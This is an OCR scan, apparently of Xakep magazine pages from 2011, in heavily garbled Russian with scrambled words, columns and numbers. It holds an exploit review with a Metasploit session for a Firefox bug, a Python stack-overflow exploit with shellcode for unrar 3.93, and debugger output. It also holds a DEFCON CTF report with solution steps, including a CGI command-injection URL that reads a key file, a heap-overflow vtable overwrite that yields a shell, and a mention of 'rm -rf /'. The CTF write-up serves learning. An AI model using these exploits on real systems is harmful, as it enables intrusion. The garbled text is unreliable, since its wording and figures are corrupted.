пsiChaппeiEveпtSiпk] далеко не имеетназначенного mChaппel . Пробл ема во

во памяти оно попадет. П отому-то равно пор-цепочка н стрела-змея н а. Те хника

том, что-то mChaппel является слабой ссылкой !как уготовлено на сопtе пt/

spгaying на основном используется подле эксплуатирова нии уязвимастей

ХАКЕР

00/153/2011

heap

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

08055082 00 00 F4 EF FF FF
08055088 09 F2
08 055 08А 09 09
0805508С 00 04 06 00

lllOU

еЬх, [ ebp+src ]
edx, esi

lllOU

есх ,

lea

Указатель

бери строк~ со оwибко

еЬх

lea

Дизассемблерный листингуязвимого места к unгаг<=3.93

на браузерах, зане быть помощи JS- скри пт ов, выполняющихся получи и распишись стороне
клиента, я получаем возможностьуправления гуртом , в отношении которой было
упомянуто выше.

Практическая показ уязвимости nри помощи модуля

аспидски проста: поднимаем сервер пр равно помощи

metasploit "a,

MSF

пошли возьми

"

Unrar 0.9.3 Local Stack
Overflow Exploit

IAV:L/АС: L/Au :N/C: С/1: С/ A:CI

клиен т, вбиваем на Fiгefox код сплоита равно видим ре з ультат работы экс­
плоита-эаnустившийся калькулятор:

[]Im
Дата релиза:

msf# exploit(mozilla_mchannel) > set PAYLOAD windows/exec
PAYLOAD=> windows/exec_ _
msf# exploit(mozilla mchannel) > set CMD calc.exe
CMD=>~qlc.exe~---·
msf# exploit(mozilla_mcмnnel) > exploit
[*] Exp loit running as background job.

02
011 01 0

CVSSV2

01111 0111 011 011 011 01
0 авгу вместе с та 0011

года, автор: ZadYгee,

CVE: N/A.

Unгаг- ра из пространенная во среде * ni х -пользователей обслуживающая программа ,
предназначенная чтобы извлечения, тестирования равным образом nросмотра содер­

жимого архивов, которые были созданы подле помощи архиватора

RAR.

Уязвимость, которую обнар у жил ZadYгee , кроется внеправильной
обработке аргументов, поступающих держи вступление утили т е.

ljЗЦ!•Iii

[*) Using URL: http://0.0.0.0:8080/cnGnliQгNQYE
[~] Local IP: httg_:_//192.168.0.23:8080LcnGnlibrNQYE
[~ ] Server started.
·- ______

Fiгefox

плоита равным образом получил сл е д у ющее :

i .mport sys _
from struct import *

jf.!;lдjfi

Mozilla

Я позволил себя капелька подправить бардовский план экс­

0.6.1 0

""i•l!liii•J:I

buf=" -" + "Зlrvs" * 017 + " АдА " + pack( "I", 0x8070197)
shellcode=" \x!; c\ x c c\xcc \ x c~\J@ a\x aa\ x aa \x aa\ x bb\x b b\x bb\x bb\_

Существуют обновления, устраняю щишки е данную слабость .

x cc \ xcc\~~!;"\~xdd \x dd \x cjd \xdd"

050

ХАКЕР

00 / 053/ 0011

В ДАЛЬНЕЙШЕМ МЫ СМОЖЕМ
ПОНАБЛЮДАТЬ ВООЧИЮ, КАК

ИСПОЛНЯЕТСЯ КОД ПОЛЕЗНОЙ
НАГРУЗКИ НА СТЕКЕ

f=opeп(" expl_optioп" , "wb" )
f.write(puf + she,)Jcode ~~12" )
f.close()_ _
В д а льн ейшем ты да я от тобой сможем п что до наблюд ать воочию, равно как ис­

п по части лня е т от автор этих строк адрес половая принадлежность ез утнапиштим нагр узк равно н а сте для е, н у а в эту пору ась? н еобхо димо
разобратьсястем,откудавзялсяадресОхВО70197вкодеэксплоита.
Перед н ами классическое п ере п ол н е ни е титьки возьми стеке из вы­
текаю щ ей из сего места перезаписью адреса возврата. Так на правах директива держи

полезную н аг р узку ле жи т на регистре

es p, так нам никуда не денешься прыг­

нуть для команду jmp es p !или др у г ую за со ледоват е льность ко манд ,
имеющую схожее д ействие!, соо тв е т от тв е нно , к сие го наш брат должны
перекатать адресочек возврата адресом команды

jmp esp. Та ко найдем а

по мнению д обн ы е а др еса на исполняемом м насчёт дул е uпгаг"а.

! ~ - ~)_QQ_jd um p -JLL usr/ Ьiп L uпrar J_gcrl) "ff е4" J_greJLjШJ1_ __
00бfebf :

0070197 :
0070317 :
007038f :
0070527 :

ff
ff
ff
ff
ff

е4

е4
е4

е4
е4

"m11
jmp
jmp
jmp
jmp

*%espc___ _ _ _ _ _ _ __
*%esp
*%esp
*%e sp
*%esp

В результате уяз вим ос ти у правл е ние настил учае т код, располагаю­
щийся сверху стеке :
(~ -~)

gdb --args uпrar "cat expl_optioп
symbols fouпd)
(gdb) r
(по debuggiпg

Star tiпg_program: Lusc/ l:!iп L uпra ~ЗlrvsЗlrvsЗlr~s .•• sЗ lrvsA~

ERROR: Uпkпоwп optioп: 0lrvs3lrvs3lrvs .. . ЗlrvsAA ...
Program received sigпal SIGТRAP, Trace / b re akpoiпt trap .
0х ЬfаЬб405 iп

?? ()

0: xL.L$_p_s:_
0xbfab_9_4_es_;__in.a .__ _
(gdb) х/20х $eip-1
0хЬfаЬб404 :

0хсссссссс

0хаааааааа

0хЬfаЬб414 :

0хЬfаЬб400

0х080б7f22

0х080бесб0

0хЬfаЬб424 :

0xdddddddd
0xbfabfdfa

0хЬЬЬЬЬЬЬЬ

0х08048Ь97

0хЫ483а8с

0х00000000

0хЬfаЬб434 :

0х00000000

0хЬfаЬба98

0х080б80е7

0xbfaЫf98

0хЬ_{.аЬб444 :

0xbfabfdfa

0х08048с77

0хЫ48За8с

0х080484б0

0хсссссссс

WEXLER.BOOK Е5001
«МПРО 0033 » ДМИТРИЯ ГЛУХОВС КОГО И ЕЩr ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО
В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

(gdl:!)_ Что равным образом требовалось мастер получи и распишись все руки вслед ть . Н у а со д е ржим ое п по части л ез хотя й нагр узки

СТИЛЬНЫЙ ГАДЖЕТ

остае т ся совершенно получи твоей со ве сти .

it·1;11Jttt:t:t
uпгаг<=3.93

,_i•J!Iiii•HI
К сожа л е нию , патчей, усик тр аняю щишки х данн ую уязвимос ть , пишущий эти строки н е нашел. Н относительно
спокон века дозволительно собственными силами сложить новоиспеченный сегме нт на исполняемом

мо д уле uпгаг ·а, д обави ть т инструмент а ко д п об пр оверке нате педикулез входных ар­
гументов да выставить соответ ствующие прыжки на нужные места .

ХАКЕР

00 / 053/2 011

:::1:::


ф WI!XLI!Г.

www.wexler.ru

рвЩ.Щf"\1"

ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 {800) 000 06 00

Ромася

хакинг

<<zyx2145>> Василен ко о, laKasperskylab

Mapaт « touzo k U >> Bыweropoдцeв, lаИнформзащита

ОТЧЕТ С ХАКЕРСКОГО КОНТЕСТА ИЗ ЛАС-ВЕГАСА
В Лас-Вегасе завершились двум
крупные хакерекие конферен­

ции :

BlackHat 0011

равным образом

DEFCON 09.

Последняя интересна безграмотный всего
сног из шибательными докладами,
а да з наменитыми соревнова­

ниями в области компьютерной безопас­

ности « Captuгe The

Flag » [CTF), во

которых в коренной раз приняла уча­

стие отряд изо России . Как сие

было равно в чем дело? заключая представляют
на лицо такие хак-квесты, расска­
жут непосредственные участни­

ки событий .

ОХО1. ЧТО ТАКОЕ CTF?
Са й твоя милость команд:

Captuгe

• Hackerdom:
www.hackerdom.ru:
•Lee!More:
leetrnore ctf.su;
•SiBears:

наборуязвимых приложений-сервисов. Основная равным образом дея заключается на

~;

• Smoked Chicken:
smokedchicken.org .

the F lag-этo игра,

во которой команды получают во рас п оряжение

том, чтоб крушить сервисы быстрее других неподвижность н д, п исатьэксплоиты,

процветать п атчиться, охранять целое во рабочем состоянии равным образом -н а н еко­
торых играх-е щ е да описыватьуязвимости во бюл л етенях безопасности

ради перед п олнительные рамы . Эдакая кибервой н а на миниа т ю р е . Со р евнова­
ния проводятся, в качестве кого п рав равным образом ло, с нескольких часов д относительно нескольких суток,

то и дело не принимая во внимание п ерер ыв овна сон. Су щ ествует д ва ос н по отношению вн ых т равно п а CTF: «Своя
игр а» равно для л ас ич еский ва р иа нт. П е р вый чаще ис п ол ьзует ся получи что до т бороч­
н ых соревно во а н иях, вт насчёт р ой н а фина л ь н ых, п оско ль ку дл автор ко л ассического

СТ Fт ребуется ибо л ее сложная инфраструкт ура.
В мире существуетнесколько подобных соревнова н ий, вклю ч ая UCSB
iCTF, NuitDu Hack, plaidC TF, RuCTFE равным образом др . DEFCON CTF п роводи тся из 0996 г.
да является старей ш им и, наверное, самым престижным изо них . В п ервые
российская неподвижность н истинно прошла во конец равно занялатам почетное 0-е простор . Мы

опередилитаких бизо н ов, во вкусе командуУниверситета Калифор н ии Санта­

Барбары [устроителей iCTF), командуУниверситета Ка р неги-Меллона,
корейцев изо P OS TE C H- Pohaпg, из п ециалистов иэ что касается д утнапиштим п равительствен­
н ой вое нн ой колтун п а н ии С Ш А, а да япо н ских, испа н ских равно аме р икан ­

ских пр офессио н а л ов на ИБ . Н что до о по всем статьям п касательно п что касается р мы д ку.

052

ХАКЕР

00/153/2011

DEFCON CTF

ОХО2.

DEFCON CTF PREQUALS

Отборочные зрелище

Defcon СТF проходят во формате Jеорагdу-англ .

названиетелеnередачи «Св оя шалость >>. Участникам предоставляются

05-30 заданий разной сложности равным образом стоимости во таких областях И Б,
во вкусе геvегsе engineeгing, foгensics, Ьinагу exploitation, packet analysis
равным образом т . д. При данном формате зрелище оболочка нда м н е нужно охранять близкие
се рверы да брать на вооружение патчи- необ хо димо попросту присуждать задачи,
выкрадывать с них флаги равно посылать их во форму ответа. Обычно,
решая задачу первой, директива получает бонусные фары вслед за « nервую
кровь».

Такой мера зрелище не столь динамичен, же позволяет одновремен­

так дуться несграниченнему числу команд. В сие м году во отборочных
да гр ахти зарегистрировалось сильнее

000 команд, да сненулевым числом
080. Интересно, который ото России на этом году выступа­
ла сборная общество Team IV, возникшая во результате слияния четы­
закончило побольше

рех сильнейших команд по мнению результатам прошлых соревнований:

Hackerdom- Уральскийфедеральный заведение ;
Leet Моге-Санкт- Петербургский общественный у нив ерси­
тет информационных технологий, механики равным образом оптики;

SiBears- Томский народный университет;
Smoked Chicken- Южно-Ураль из киек государственно-монополистический университет.
Объедини во усилия, ты да я очертание равным образом ровали не без; похитчик первой российской
командой на финале

DEFCON CTF вместе с претензией сверху победу. По иронии

судьбы, первенство заняла 0-е луг в отборочном сия п е равно таким
образом попала на меню тех

02 команд.

которые по мнению регламенту про­

ходят во финал. Для примера прив е дем н есколько вслед за даний .

Форматпередачи « Своя равно гран: разныеобласти ИБ равно разная сложностьзаданий

GRAB100

PWTENT PWNABLES 000

Веб-сервер получай

Бинарникспереполнениемкучииутечкойпамяти

SPDY
На порту 0932 вслед пущ ен отнюдь не каковой сервис. По сле продол жи ­
тельных манипуляций выясняется, сколько сие apache, авралящий по мнению
протоколу SPDY !улучшенная проведение в жизнь НТТР с Google]. Нахо­
партия бажный из крипт во /cgi-Ьin/ да пробуем увести из-под носа отпирка со временем

изучения директорий

Реверс бинарника показывает, аюшки? рядом посыл ке команды

upload_
classel другими словами class82 на
случайном порядке . Метод class_82: :сору _buffer уязвим ко перепол­

new_record

создается одиночный экз емпляр класса

нению титьки , которое дает24 байта перезаписи на куче.

http: / /pwn583.ddtek.Ьiz :5932/cgi-Ьin/

phf?Qalias=%8Acat%28/home/TkfбzKZd/key. Не срабатывает !филь­

void Цass_82::co py _b uffec.(class_82 • this , char • buffer)

труется обещание keyl. Меняем запрос: http://pwn583.ddtek.Ьiz:5932/

{

cgi- Ьin/phf?Qalias=%8Aca t %28/home/Tk fбzKZd /k*. П случае м флаг:
that "s fast enough now go take а rest.

unsigned int i;
for (i=е ; i <=248 ; + + i) this ->buffer[i]=buffer[i];

___ - - - - - - - - - - - - - - - - - - - -

}
FORENSICS 000
Образ NTFS не без; необычным файловым атрибутом
Выданный обложка размером ровным счетом 00 Мб представляет с лица икона
ди ска вместе с NТFS"ным разделом. Итиль ско п ки загрузчика на MBR синь порох неграмотный дали, даже симпатия равно выглядел малограмотный совершенно стандартным. Засунув
представление на

X-Ways Foгensics, автор сих строк увидели, в чем дело? на корне раздела лежат
000 каталогов вида dir**, во каждом с которых к примеру в соответствии с 020
файлов. Всего 01 078 файлов, с головы со уникальным содержимым,
попадающим подо регулярное отображение ([e-9a-f]\8{24}){48}.
Натравив утилиту ntfswalk, обнаружили nодозрительный файл\

Используя эту но уязвимость, автор сих строк можем подравнять сызнова равно перемен­
ные

buffer_len

равным образом

class_count, а

по прошествии времени пригласить команду

dump_obj,

котораяскопируетстолькоданны~ ск олькоустановленовзначение

buffer_len. Затем да мы со тобой создаем небольшую толику экземпляров класса, удаля­
ем один, приближенно что такое? некто образует дыру на куче, куда ни на есть кроме помещаются ма­
ленькие объекты слыхать

hash_str иначе говоря rb_tree_item. Далее вызываем
view record, с целью посм отреть, идеже на куче находится rb_tree_item.
Используя rb_tree_item, узнаем адресочек нашего экземпляра класса да
яички не без; нашим шеллкоде м . Переписываем vftaЫe, приближенно воеже возлюбленная

dirб8\key58883 . Подозрителен дьявол был тем, который его файловая копия

указывала получай выше- шеллкод, да вызываем любую функцию, дай тебе спирт

на $MFT содержала н естан дартный NТFS-атрибут со номером 01 Oh,

сработал. Получаем шелл.

в этом случае по образу на <<стан дарт е>>
в меньшей степени

NTFS описаны чуть атрибуты вместе с номерами
BINARY LЗЗTNESS 000

000h.

Мы заглянули во сей 010h-й качество от через совершенно того но

Исполняемый РЕ-файл сантиотладкой

X-Ways F oгensics, расковыряли его lструктурно дьявол был п охож сверху

При первом просмотре обложка на деле неупакованным, только содер­

атрибуты известных типов], вычислили, на каких кластерах храня тся

житвсеголишь три импорта:

его способности , да вытащили их. Вообще, естьдовольно распростра­
ненная практи ка прят ать секретные показатели во <<а льтернативных

потоках данных

NTFS >> - атрибутах из номером 00h, отличающимся

CloseHandle;
HeapAlloc;
memset.

именем потока. Для поиска равно пр осмо тра альтернативных потоков
данных убирать куча готовых утилит, видимо, посему организато-

Это означает, ась? безвыездно другие функции симпатия получает подвижно

ры поступили хитрее равным образом спрятали информация во самодельном NТFS­

и, что далеко не хитроумно обнаружить, делаетэто помощью РЕВ сра зу позднее ОЕР.

атрибуте. Извлеченныебайтики имели как следует эдакий но вид, вроде равно

После сего схема создает серия потоков вместе с антиотладкой.

обычноесодержимоевсехостальныхфайловlмаскировалисьпод

Некоторые используемые ухватки антиотладки:

них] . Выкинув нулевые байты, получили ответ:

e83Se21ce888934d4c8f7e.

ХАКЕР

00/153/2011

07a96fac9edb9Se641

NtQueryinformationProcess with (push leh ; ProcessDebugObjectнandLe);
Rdtsc check;

053

хакинг

ОХОЗ. ФИНАЛ. КЛАССИЧЕСКИ И

CTR

Финальные зрелище проводятся на классическом формате, приближенном для

CREDITS

реальномухакингу. Каждая распоряжение имеет пакет сервисов, работающи х
либо получи и распишись отд е льном се рвере , либо держи виртуальной машине, либо, равно как во текущий
раз, вн утриjаil. Основная следовать дач а-за щищатьсв ои сервисы да пойти приступом

Хотелось бы поблагодаритьтех ребят с команды

IV !читается в качестве кого рим­

ч ужие. Результатуспешной атаки -по хи щенный знак противника. За

ская << цифра », пускай бы иностранцы завистливо называют нас <<ай ВИ>>I,

перезапи сь флага пр отивника начисляются дополнительные очки. Свои

которыеучаствовали во отборочных, же по части разным причинам неграмотный смогли

а флаги н контия однако храни ть на неприкоснов енности, однако во впредь до сту пностидля

попасть нате финал: кому-то никак не дали визу, неизвестный невыгодный ес спонсоров

проверяющего скрипта жюри. Финал соревнований относительно хо дит на очной

забашлять поездку, черт знает кто ушел во много . Команда благодариткомпании

форме, целое команды собираются во одном большом зале. Благо, на что до теле

НИП <<Ин формзащита » вслед подходящий вкладывание на оплату поездки своих

Rio, во котором для хо дила

сотрудников, СКБ <<Контур» после благотворительность екатеринбургской части

Лас-В е га не без; славится самыми большими отелями на мире. По регламенту

конференция, таки х помещений до черта : неэря

команды, университеты из-за познания да помощь.

DEFCON CTF, ради од ним столом нужно из идеть неграмотный сильнее восьми особа
выгода одна овца. Овца? Да , организаторы соревнований малограмотный стесняются

своей страстной любви для s h eepfuck iпg , да какое сие имеетотношение для
информационной безопасности, ни одна душа отнюдь не знает. Кстати, следовать фотографию

совокупле нияснадув н ойрезино войовцойоргани заторыраздав или
эксклюзивныефутболки-стоит ли говорит ь, чтофутболки разашлись
на п ервыедеся ть минут равным образом на нашей командетаких футболок двум ? Вне вместе с тола

NtSetinformationThread with (push llh ;

ThreadНideFromDebugger) .

Обойти их непросто, так отрыть паче подробную информацию от м, как бы
э так сделать, неграмотный составиттрудадля искушенного читателя. Затем nроцесс
выделяетпамять да копируеттуда код, со держащий первый п что касается лезный

функционал,дальнейшееисполнениепроисходитввыделеннойпамяти.

Однако есть ли не мудрствуя лукаво реализовать программу вплоть до конца равно снятьдамп, так
во нем я найдемтолько комбинация известных философских цитат. В ся лизунец
вместе с прятан а на алгоритме их расшифровки. При расшифровке используется

ключ, какой-никакой кладется держи стека равно удаляется с адресного простран не без; тва
процесса. Именно поэтом у, когда сорвать дамп , заместо ключа наша сестра получим

вoттaкoйнaбopбaйт:eseeszeeeseeszeeeseeszeeeseeszeeeseeszeeesees

0eeeseeszeeesees2ee. Ес ли но проанализироватьалгоритм расшифров­
ки подотладчиком-о чудо, смотри равным образом свой ключ: 0FEЗ90ЗDF19E4B01ACS90FBA67

0DC8752BD68339E49147F29F5502AD6310BB71.

051.

ХАКЕР

00/153/201 0

DEFCON СТF

Сервис:
Порт:

Castle

0629

Функциональность: При соедине нии читает показатели с сокета давно

появл ен ия

<< EOF\n >> . Считанные факты сохра няются изумительный временном
<</tmp/cast leXXXXXXXX>>, идеже ХХХХХХХХ- случайные
После сего castle перенаправляет stdin, stdout равным образом stderr

файле вида
значения .

во сокет да запускает непохожий исполняемый обложка /usr/local/Ьin/sandy от
параметрами <<-о < IPvб >

-d -s /t mp/cast leXXXXXXXX>>,

идеже IPvб-

адрес, из которого случилось соединение.

Уязвимость: Непосредственно чувствительность находилась во

Ход решения: См.

sandy.

sandy.

Cepвиc:Bunny
Порт:

05323

Функциональность: При установке соединения обслуживание не без; через

srand(time(e)) генерирует псевдослучайное численность [ma x_ sizel через 0
04. После сего закрывает предыдущее сращивание равным образом генерирует
уже одно п севдослучайное наличность [rand_portl, да еще во ди апазоне
ото 0024 предварительно 05 034, равным образом использует его как бы nорт пользу кого ожидания нового

накануне

соединения [Ьind+listenl . Если оборона исходит связывание в отваленный
порт, ведь считывает

0 байт равно сохраняет
max_size раз.

на массиве длиною во

02

байт .

Повторяет операции

Уязвимость : Как не запрещается заме тить,
рядом этом сосредоточение

haystack

лишь

ma x_size может бытовать вплоть до 04 байт,
02 байт - явное захлестывание

буфера. Однако принимать двушник подводных камня . Во-первых , чтобы того
воеже вносить во буфер, нужно вкушать закидон случайного порта ,
а симпатия через

0024

впредь до

05 034.

На подмога около ходит ведь , что-то

seed

рядом

инициализации генератора псевдорандомных чисел равен

time(e) ,

а системное момент у всех команд что до дин аковое. Во-вторых ,

обуревание жуть маленькое, такое маленькое, который почти хо дящи х

зкс плоитов такого размер а нет. Хитрость во томишко , аюшки? круглым счетом по образу

max_size
массивом

лежит в ст еке, в обществе геt-адресом равно переполняемым

haystack,

нужно перебелить его, а где-то по образу спирт является

счетчиком итераций, так за сие го не грех проэксплуатировать столько

памяти с целью экс плоита , сколько стоит потребуется.
Ход решения: <<Хорошая мысля рядом ходит опосля>>- во данном случае
сие вот поэтому и есть свой кейс. П ереполнение нашли, особенный стервис запатчили,
да эксплоит по неизвестной причине зараз безграмотный получилось написать, равно появился возлюбленный у

нас лишь только подина истечение игры. Что ж, во следую щий единожды будем проворн ее.

Сервис: Hiveг
Порт:44366
Функциональность: Пр равным образом соединении читает данны е изо сокета :

первые

0

байта- периметр жете кета , дал ее сам по себе пакет. Создает фильтр

Бл ума, во котором опре деле только

счи тывает полотнище с файла

равным образом использует его на качестве битового

key

разных хеш - функций. По не без; л е зто го

массива. Считанные с Сети документация использует про проверки того,
принадлежат ли они для битовому множеству тож блистает своим отсутствием . На выходе близ

каждом запуске стало быть конфигурация изо

значащих бит. По зи ция

каждого битка соответств ует номеру хе ш -фу нкции на фильтре Блума ,
значительность соответствует значению битка с флага , чья по части зиция
вычисляется бери основе хеша .

Уязвимость: Сгенерировать такого склада конфигурация входных параметров, с намерением
пр ограмма отдала безвыездно значения битов с фла га, по прошествии что-что сконцентрировать с
них флаг.

Ход решения: В минута ночи, задним числом первого дня соревнований, усталые
И расстроенные тем фактом, что такое? получи морда наперекор нашей команды
по этих пор О очков, автор решили отремонтировать ситуацию. Через п ару часов
эксплоит был выпивши и, довольные , наша сестра завали ли сь спать.

ХАКЕР

00/153/2011

055

взламывание

КАКИЕ ЕЩЕ ЕСТЬ

CTF?

The UCSB iCTF
ictf.cs .ucsb.ed u
Международные студенческие соревнования,
которые проводитуниверситет Калифорнии Санта­
Барбарывначале декабря. Известны, заблаговременно
всего, тем, который вместе с

0008 г.

всякий бадняк сносят крышу,

придумываясовершенноновыеправилаигры,

которые сильнее нигде неграмотный встречаются.

CODEGATECTF
www.codegate .afg
Корейцы известны своей любовью ко киберспорту.
Ежегодно на Корее проводится

0-4 CTF, связанные

обыкновенно со конференцией до ИБ .

CODEGATE CTF,

кой проводится во начале мая, является одним
изо лучших tаsk-Ьаsеd-соревновани й.

RUCТFE
www . гuctf . oгg

количестволюдей отнюдь не регламентируется , поэтомунекоторые читеры !не

Команда Hackeгdom изо УрГУ -первая российская

будем выказывать пальцем нате команду с Японии! сидели да реверсили

команда, которая азбука исполнять на

преграда CTF на России. С

0007 г.

CTF равно

продви­

старательно организуют

студенческие всероссийские соревнования
С

0009 г.

RuCTF.

на декабре проводят международные со­

ревнования, которые отличаются стабильностью,

масштабностью да интересными сервиса ми.

наполурядомсостоломвсреднемколичестве20человек.Намвэтом
смысле безвыгодный повезло, т. к. большей части команды далеко не дали американские

визы послеупоминания словосочетания <<компьютерная тревога >>
для собеседовании во консульстве. Удаленно поучаствовалоочень маловато
игроков, на основном через разницы нет слов времени.

CTF начался стого, что-нибудь автор сих строк обнаружилитолько флешкус ключами
доступа для своему серверу, пара LАN-кабеля lдо сервера равным образом впредь до игровой

plaidCTF
www.plaidctf.com

сети!, однуэлектрическую розеткууевсего стола. Пришлосьбратьтакси

Команда РРР изо Карнеги-Меллон, появившаяся на

блекджек равно распутна свичи да ради вода, т. к. пустое место с организаторов никак не

0009 г.,

предупреждал об их отсутствии. С задержкой на три часа шутка началась, да

илететь на стек электроники неподалеку, чтоб потратить$300 получай

вмиг основы изъявлять высокие результа­

твоя милость около возьми всех соревнованиях. Послетого в духе им

во кабелях появилсялинк. Чтоделать дальше, нужно былоузнать самим.

поперек середыша всех обыгрывать, они решили обитать

Запускаем снифер получи кабеле ко серверу, видим IСМРv6-трафик. Вспоми­

своисоревнования . Парниоправдалиожидания

наем, равно как вздувать 0Рv6-интерфейсы, тут же узнаем, что-то однако руки-ноги ко­

равно устроили на апреле соревнования со интерес­

манды прогуляли Woгld

нейшими заданиями равно необычным геймбордом

всё-таки сервисы были написаны подина 0Pv6. Пришлось немедленно записывать

lgameboaгdl во виде плана здания.

вседомашниезаготовки подшестые со кеты.

PHDCТF

чтоJаil-это устройство виртуализации уровня ОС на FгeeBSD, позволяю­

0Pv6 Day. Сюрпризом зрелище было то, который нацело

Сервер представлял из себя FгeeBSD

0.2, изрубленный Jail. Напомним,

phdays . гu/ctf geпeгal . asp

щий образовать порядочно независимых мини-ОС со своим набором прило­

Positive Hack DауsСТF-международные сорев­

жений равно настройками. Таким образом, каждая отряд работала во своем

нования позащите информации , которые впервинку

Jail"e, а организаторы

проводились на мае

Именно чepeзJail организаторы обновляли равно проверяли файлы не без; флага­

0011

г. Запомнились до просто-напросто

отличной организацией, масштабностью, интерес­
ными сервисами равным образом разнообразными заданиями.

неослабно имели проверка надвсеми системами.

ми. Данный приспособление отличается ото привычного нам, от случая к случаю флаги про­
веряются да обновляются самый при помощи работающие получи системе
сервисы,видим~разработчикипростополенилисьписатьсистемукак

следует. Мы неграмотный преминули выехать сим недостатком: ибо
сервисы были собственно безграмотный связаны вместе с флагами, наша сестра затуннелировали
весьтрафик равным образом перенесли целое приложения бери отдельную виртуальную
машинутаким образом, что, даже если получив доступ, соперники невыгодный могли

ИДЕЯ ЗАКЛЮЧАЕТСЯ В ТОМ,
ЧТОБЫ ЛОМАТЬ СЕРВИСЫ
БЫСТРЕЕ ДРУГИХ КОМАНД,
ПИСАТЬ ЭКСПЛОИТЫ, УСПЕВАТЬ

ПАТЧИТЬСЯ И ПОДДЕРЖИВАТЬ
ВСЕ В РАБОЧЕМ СОСТОЯНИИ
056

пробежать наши флаги, находящиеся бери реальном сервере, а я могли
лишать равным образом рассматривать трафик, поступающий для нам.

Игровые телескопы начислялись командам после покража флага и/или
перезапись своим специальным флагом-маркером. После перезаписи
флагиавтоматическивосстанавливалисьвпрежни~сохраняявоз­
можностьдругим командам слямзить их. Начисленные гляделки следовать флаги
умножались нате доля доступности сервисов, предотвращая ситуа­

цию, когда-никогда команды не мудрствуя лукаво выключили бы всё-таки сервисы равно достигли
000%-нойзащиты.Доступностьсервисовпроверяласьчерезбэкдорв
приложениях- кабы бэкдор жив, значит, равно прибавление работает. До­
полнительныеочкиза«первуюкровь•давалиськомандам,которые

первыми сумели проэксплуатировать чувствительность во сервисе.

ХАКЕР 0О /153/2011

DEFCON CTF

Сервис: Foгgetu
Порт:

0128

Функциональность: При соединении на три этапа читает исходняк изо сокета .

На каждом фазис е соответственно данным по слухам хеш-функ ция через п олученны х
данных, равным образом когда хеш удовлетворяет указанному, в таком случае схема переходит

получи нижеприведённый этап. На первом этапе целое просто: нужно далеко не унаследовать хе ш,

эквивалентный 0хВ3300703 [он используется организаторами в целях активации
бэкдора, проверяющего умелость сервиса ! . На втором каста п е
нужно почерпнуть хе ш

exFC1BE02A,

тут-то расписание так тому и быть дальше. При этом

максимальное значимость считываемых данны х с сокета нате э ти х этапах

027 байт, в чем дело? невыгодный превышает размер выделенного получи стеке массива.
Уязвимость: П ере п олнение яички находится получай третьем буква пе, эпизодически
задним числом подсчета очередного хеша по мнению входным данным содержание

использует хе ш на качестве значения максимального количества байт
подле считывании сл едующей порции данных. Вот тут-то во стекавый ягодицы

[datal размером на 028 байт не возбраняется положить нате бумагу столько байт, насколько ко нужно
к переполнения равно эксплоита [последний бис RacvDataFromSocketl .
Ход решения: К большому сожалению , купились получи и распишись великий размер
файла равным образом безвыгодный стали овладевать его во самом начале, несмотря на то обуревание
ужас простое- сбрутить хеш равно известить зксплоит.

ОХО4. ОРГАНИЗА ИЯ
Примеры заданий автор привели кайфовый врезке, а сильнее д ета льное дефиниция

Cepвиc:Sandy

взлома каждого с сервисов равным образом прим е ры экс плоитов твоя милость можешь

встретить на благах нашей команды . Стоит отметить, что такое? игруха во зто т крат
была спроектирована изо рук пошел вон отсюда плохо. Обычно разработчики

CTF

стараются представить бери пропал допустимость получения рут а. Иначе, по­
лучив рут, повеление сможе т приделать ноги флаги с сервисов, которые далеко не

были по-на на ногах щему взломаны, а наконец нагнать
/ », довременно заве ршая игру ради со п ерника. Сервис
был убавлять льготы не без; гооt накануне юзера

«rm -rf
tomato повинен

tomato , так такогоюзеране

Порт: -

Функциональность:

Sandy представляет лицом неведомый от ильно

адаптированный комментатор языка С.
Уязвимость: Ч ерез

castle дозволяется отправить программу, которая бы

считывала ключи равно отправляла да х нам, а походя да пер еза писывала бы
ключи у соперника. Однако н е до сей времени таково прямо-таки . К сожалению,

fopen далеко не

су ще ст вовало- зато существовал tomatoг. Проэк сп луатировав зто

интерпретировался должным образом равно пришлось подыскивать обходные

приложениена сервереневнимательной команды, позволительно было полу­

варианты.

чить гооt равным образом сволочь всегда флаги. Мы нашли однутакую команду, успели
Ход решения : Fор еп исnользовать воспрещено , зато отличный работает

ста щить постоянно флаги, да закрепи ться, для сожалению , безвыгодный успели.

На дальнейший табель общество l оl lег skВtе г zумудрила сь отшагать ограни­

чения разработчиков равно истощиться изо Jail"a , получив рут в хае т-машин е.

fpгintf, на которую на ка честве параметров дозволяется отдать уязвимую
форматную строку равным образом на ходу эксплоит.

Ребята собрали однако флаги со всех команд, а отчего-то никак не озаботились
доступностью своих сервисов, позтом у очков следовать потеть над чем неграмотный смогли вплоть до

того момента, по образу разработчики до сей времени запа тчили .
На беспристрастный д ень зрелище ча сть наши х игроков, далеко не занятых ревер сом, ре­

Сервис: Sheepsteг
Порт:

0775

шила просканить сетки других команд во поисках чего-нибудь вкусного
держи пользовательских машинах. Забавно было разыскать официальный веб­
сервер команды

Функциональность: При соединении читает способности изо сокетаи
сравнивает со указанными значениями. Если вместе с равнения прошли усnешно,

PLUSfaPostech со всеми их наработками по мнению экс плои­
там, лагами работы зксплоитов со флагами равным образом приватным ssh ключом
через их сервера. На DEFCON от вашим компьютером может nроизойти почто

так ради сит насадить псевдоним да прив етствует:

у годно , не фунт изюма отнюдь не заб ывать об зто м.

блага, на котором не возбраняется причислять да nросматривать следовать писи .

ОХО5. WHAT HAPPENS IN VEGAS STAYS IN VEGAS
После соревнований ты да я сняли пентхаус нате 09-м эт аже отеля

Bellagio

равно устроили afteг рагtу от блекджеком равно pttettyТ на нары хма со временем равным образом да в соответствии с эз ией

Ш експи ра. Ла вместе с В е га из - зто городец , на ко тором ничуть невыгодный хо ч е т ся
разрабатывать информационной безопасностью, впрочем вблизи
посетителей

05 000

Black Hat равно DEFCON каждый год приезжаюттуда, в надежде

<<Welcome to the ddtek

Ьlog » .

Само сообразно себя пр иложение предста вляет внешне схематичный подобие

Уязвимость: П ер ваяпроверка введенны х данных оборона ходит со строкой

<< zzyzxrd ». Если симпатия прошла успешно, ведь выставляется полотнище [flagl, близ
котором на дальнейшем на программе вме сто fputs используется fpгintf из
уязвимой форматной строкой. Втораяпроверка со строкой <<х" lХРРТН@8 »

позднее применения несложного кодирования [вх одная черта должна
